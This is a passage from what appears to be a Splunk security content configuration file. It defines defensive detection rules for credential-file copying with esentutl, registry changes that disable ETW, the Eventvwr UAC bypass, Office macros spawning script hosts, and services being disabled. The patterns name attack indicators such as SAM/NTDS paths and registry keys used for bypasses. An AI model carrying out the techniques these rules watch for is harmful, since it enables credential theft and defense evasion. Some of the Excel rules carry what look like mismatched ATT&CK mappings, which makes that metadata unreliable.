The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited. Filter as needed. action.escu.creation_date = 2021-08-18 action.escu.modification_date = 2021-08-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Esentutl SAM Copy - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Credential Dumping", "Living Off The Land"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Esentutl SAM Copy - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_esentutl` Processes.process IN ("*ntds*", "*SAM*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `esentutl_sam_copy_filter` [ESCU - ETW Registry Disabled - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a registry modification to disable ETW feature of windows. This technique is to evade EDR appliance to evade detections and hide its execution from audit logs. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.006", "T1127", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a registry modification to disable ETW feature of windows. This technique is to evade EDR appliance to evade detections and hide its execution from audit logs. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - ETW Registry Disabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Hermetic Wiper", "Windows Persistence Techniques", "Windows Privilege Escalation", "Windows Registry Abuse", "CISA AA23-347A", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = Modified/added/deleted registry entry $registry_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - ETW Registry Disabled - Rule action.correlationsearch.annotations = {"analytic_story": ["Hermetic Wiper", "Windows Persistence Techniques", "Windows Privilege Escalation", "Windows Registry Abuse", "CISA AA23-347A", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.006", "T1127", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a registry modification to disable ETW feature of windows. This technique is to evade EDR appliance to evade detections and hide its execution from audit logs. action.notable.param.rule_title = ETW Registry Disabled action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*\\SOFTWARE\\Microsoft\\.NETFramework*" Registry.registry_value_name = ETWEnabled Registry.registry_value_data=0x00000000) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `etw_registry_disabled_filter` [ESCU - Eventvwr UAC Bypass - Rule] action.escu = 0 action.escu.enabled = 1 description = The following search identifies Eventvwr bypass by identifying the registry modification into a specific path that eventvwr.msc looks to (but is not valid) upon execution. A successful attack will include a suspicious command to be executed upon eventvwr.msc loading. Upon triage, review the parallel processes that have executed. Identify any additional registry modifications on the endpoint that may look suspicious. Remediate as necessary. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following search identifies Eventvwr bypass by identifying the registry modification into a specific path that eventvwr.msc looks to (but is not valid) upon execution. A successful attack will include a suspicious command to be executed upon eventvwr.msc loading. Upon triage, review the parallel processes that have executed. Identify any additional registry modifications on the endpoint that may look suspicious. Remediate as necessary. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Some false positives may be present and will need to be filtered. action.escu.creation_date = 2022-11-14 action.escu.modification_date = 2022-11-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Eventvwr UAC Bypass - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "IcedID", "Living Off The Land", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = Registry values were modified to bypass UAC using Event Viewer on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Eventvwr UAC Bypass - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "IcedID", "Living Off The Land", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following search identifies Eventvwr bypass by identifying the registry modification into a specific path that eventvwr.msc looks to (but is not valid) upon execution. A successful attack will include a suspicious command to be executed upon eventvwr.msc loading. Upon triage, review the parallel processes that have executed. Identify any additional registry modifications on the endpoint that may look suspicious. Remediate as necessary. action.notable.param.rule_title = Eventvwr UAC Bypass action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time) AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid | `drop_dm_object_name(Processes)` | join process_guid [ | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*mscfile\\shell\\open\\command\\*") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`] | fields firstTime lastTime dest user parent_process_name parent_process process_name process_path process registry_key_name registry_path registry_value_name registry_value_data process_guid | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `eventvwr_uac_bypass_filter` [ESCU - Excel Spawning PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies Microsoft Excel spawning PowerShell. Typically, this is not common behavior and not default with Excel.exe. Excel.exe will generally be found in the following path `C:\Program Files\Microsoft Office\root\Office16` (version will vary). PowerShell spawning from Excel.exe is common for a spearphishing attachment and is actively used. Albeit, the command executed will most likely be encoded and captured via another detection. During triage, review parallel processes and identify any files that may have been written. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following detection identifies Microsoft Excel spawning PowerShell. Typically, this is not common behavior and not default with Excel.exe. Excel.exe will generally be found in the following path `C:\Program Files\Microsoft Office\root\Office16` (version will vary). PowerShell spawning from Excel.exe is common for a spearphishing attachment and is actively used. Albeit, the command executed will most likely be encoded and captured via another detection. During triage, review parallel processes and identify any files that may have been written. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited, but if any are present, filter as needed. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Excel Spawning PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$, indicating potential suspicious macro execution. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excel Spawning PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following detection identifies Microsoft Excel spawning PowerShell. Typically, this is not common behavior and not default with Excel.exe. Excel.exe will generally be found in the following path `C:\Program Files\Microsoft Office\root\Office16` (version will vary). PowerShell spawning from Excel.exe is common for a spearphishing attachment and is actively used. Albeit, the command executed will most likely be encoded and captured via another detection. During triage, review parallel processes and identify any files that may have been written. action.notable.param.rule_title = Excel Spawning PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name="excel.exe" `process_powershell` by Processes.parent_process Processes.parent_process_name Processes.process_name Processes.user Processes.dest Processes.original_file_name | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)`|`security_content_ctime(lastTime)` | `excel_spawning_powershell_filter` [ESCU - Excel Spawning Windows Script Host - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies Microsoft Excel spawning Windows Script Host - `cscript.exe` or `wscript.exe`. Typically, this is not common behavior and not default with Excel.exe. Excel.exe will generally be found in the following path `C:\Program Files\Microsoft Office\root\Office16` (version will vary). `cscript.exe` or `wscript.exe` default location is `c:\windows\system32\` or c:windows\syswow64`. `cscript.exe` or `wscript.exe` spawning from Excel.exe is common for a spearphishing attachment and is actively used. Albeit, the command-line executed will most likely be obfuscated and captured via another detection. During triage, review parallel processes and identify any files that may have been written. Review the reputation of the remote destination and block accordingly. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following detection identifies Microsoft Excel spawning Windows Script Host - `cscript.exe` or `wscript.exe`. Typically, this is not common behavior and not default with Excel.exe. Excel.exe will generally be found in the following path `C:\Program Files\Microsoft Office\root\Office16` (version will vary). `cscript.exe` or `wscript.exe` default location is `c:\windows\system32\` or c:windows\syswow64`. `cscript.exe` or `wscript.exe` spawning from Excel.exe is common for a spearphishing attachment and is actively used. Albeit, the command-line executed will most likely be obfuscated and captured via another detection. During triage, review parallel processes and identify any files that may have been written. Review the reputation of the remote destination and block accordingly. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited, but if any are present, filter as needed. In some instances, `cscript.exe` is used for legitimate business practices. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Excel Spawning Windows Script Host - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$, indicating potential suspicious macro execution. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excel Spawning Windows Script Host - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following detection identifies Microsoft Excel spawning Windows Script Host - `cscript.exe` or `wscript.exe`. Typically, this is not common behavior and not default with Excel.exe. Excel.exe will generally be found in the following path `C:\Program Files\Microsoft Office\root\Office16` (version will vary). `cscript.exe` or `wscript.exe` default location is `c:\windows\system32\` or c:windows\syswow64`. `cscript.exe` or `wscript.exe` spawning from Excel.exe is common for a spearphishing attachment and is actively used. Albeit, the command-line executed will most likely be obfuscated and captured via another detection. During triage, review parallel processes and identify any files that may have been written. Review the reputation of the remote destination and block accordingly. action.notable.param.rule_title = Excel Spawning Windows Script Host action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name="excel.exe" Processes.process_name IN ("cscript.exe", "wscript.exe") by Processes.parent_process Processes.parent_process_name Processes.process_name Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)`|`security_content_ctime(lastTime)` | `excel_spawning_windows_script_host_filter` [ESCU - Excessive Attempt To Disable Services - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic will identify suspicious series of command-line to disable several services. This technique is seen where the adversary attempts to disable security app services or other malware services to complete the objective on the compromised system. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1489"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic will identify suspicious series of command-line to disable several services. This technique is seen where the adversary attempts to disable security app services or other malware services to complete the objective on the compromised system. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-05-04 action.escu.modification_date = 2021-05-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive Attempt To Disable Services - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["XMRig", "Azorult"] action.risk = 1 action.risk.param._risk_message = An excessive amount of $process_name$ was executed on $dest$ attempting to disable services. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive Attempt To Disable Services - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig", "Azorult"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1489"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "sc.exe" AND Processes.process="*config*" OR Processes.process="*Disabled*" by Processes.process_name Processes.parent_process_name Processes.dest Processes.user _time span=1m | where count >=4 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_attempt_to_disable_services_filter` [ESCU - Excessive distinct processes from Windows Temp - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic will identify suspicious series of process executions. We have observed that post exploit framework tools like Koadic and Meterpreter will launch an excessive number of processes with distinct file paths from Windows\Temp to execute actions on objective. This behavior is extremely anomalous compared to typical application behaviors that use Windows\Temp. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic will identify suspicious series of process executions. We have observed that post exploit framework tools like Koadic and Meterpreter will launch an excessive number of processes with distinct file paths from Windows\Temp to execute actions on objective. This behavior is extremely anomalous compared to typical application behaviors that use Windows\Temp. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Many benign applications will create processes from executables in Windows\Temp, although unlikely to exceed the given threshold. Filter as needed. action.escu.creation_date = 2022-02-28 action.escu.modification_date = 2022-02-28 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive distinct processes from Windows Temp - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Meterpreter"] action.risk = 1 action.risk.param._risk_message = Multiple processes were executed out of windows\temp within a short amount of time on $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive distinct processes from Windows Temp - Rule action.correlationsearch.annotations = {"analytic_story": ["Meterpreter"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process distinct_count(Processes.process) as distinct_process_count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_path = "*\\Windows\\Temp\\*" by Processes.dest Processes.user _time span=20m | where distinct_process_count > 37 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_distinct_processes_from_windows_temp_filter` [ESCU - Excessive File Deletion In WinDefender Folder - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies excessive file deletion events in the Windows Defender folder. This technique was observed in the WhisperGate malware campaign, where adversaries exploited Nirsoft's advancedrun.exe to gain administrative privileges and then executed PowerShell commands to delete files within the Windows Defender application folder. Such behavior is a strong indicator that the offending process is attempting to corrupt a Windows Defender installation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies excessive file deletion events in the Windows Defender folder. This technique was observed in the WhisperGate malware campaign, where adversaries exploited Nirsoft's advancedrun.exe to gain administrative privileges and then executed PowerShell commands to delete files within the Windows Defender application folder. Such behavior is a strong indicator that the offending process is attempting to corrupt a Windows Defender installation. action.escu.how_to_implement = To successfully implement this search, you must ingest logs that include the process name, TargetFilename, and ProcessID executions from your endpoints. If you are utilizing Sysmon, ensure you have at least version 2.0 of the Sysmon TA installed. action.escu.known_false_positives = Windows Defender AV updates may trigger this alert. Please adjust the filter macros to mitigate false positives. action.escu.creation_date = 2024-03-05 action.escu.modification_date = 2024-03-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive File Deletion In WinDefender Folder - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Data Destruction", "WhisperGate", "BlackByte Ransomware"] action.risk = 1 action.risk.param._risk_message = Excessive file deletion events were detected in the Windows Defender folder on $dest$ by $user$. Investigate further to determine if this activity is malicious. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"threat_object_field": "deleted_files", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive File Deletion In WinDefender Folder - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "WhisperGate", "BlackByte Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies excessive file deletion events in the Windows Defender folder. This technique was observed in the WhisperGate malware campaign, where adversaries exploited Nirsoft's advancedrun.exe to gain administrative privileges and then executed PowerShell commands to delete files within the Windows Defender application folder. Such behavior is a strong indicator that the offending process is attempting to corrupt a Windows Defender installation. action.notable.param.rule_title = Excessive File Deletion In WinDefender Folder action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode IN ("23","26") TargetFilename = "*\\ProgramData\\Microsoft\\Windows Defender\\*" | stats count, values(TargetFilename) as deleted_files, min(_time) as firstTime, max(_time) as lastTime by user, dest, signature, signature_id, Image, process_name, process_guid | rename Image as process | where count >=50 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_file_deletion_in_windefender_folder_filter` [ESCU - Excessive number of service control start as disabled - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection targets behaviors observed when threat actors have used sc.exe to modify services. We observed malware in a honey pot spawning numerous sc.exe processes in a short period of time, presumably to impair defenses, possibly to block others from compromising the same machine. This detection will alert when we see both an excessive number of sc.exe processes launched with specific commandline arguments to disable the start of certain services. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This detection targets behaviors observed when threat actors have used sc.exe to modify services. We observed malware in a honey pot spawning numerous sc.exe processes in a short period of time, presumably to impair defenses, possibly to block others from compromising the same machine. This detection will alert when we see both an excessive number of sc.exe processes launched with specific commandline arguments to disable the start of certain services. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Legitimate programs and administrators will execute sc.exe with the start disabled flag. It is possible, but unlikely from the telemetry of normal Windows operation we observed, that sc.exe will be called more than seven times in a short period of time. action.escu.creation_date = 2021-06-25 action.escu.modification_date = 2021-06-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive number of service control start as disabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics"] action.risk = 1 action.risk.param._risk_message = An excessive amount of $process_name$ was executed on $dest$ attempting to disable services. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive number of service control start as disabled - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` distinct_count(Processes.process) as distinct_cmdlines values(Processes.process_id) as process_ids min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes WHERE Processes.process_name = "sc.exe" AND Processes.process="*start= disabled*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_id, _time span=30m | where distinct_cmdlines >= 8 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_number_of_service_control_start_as_disabled_filter` 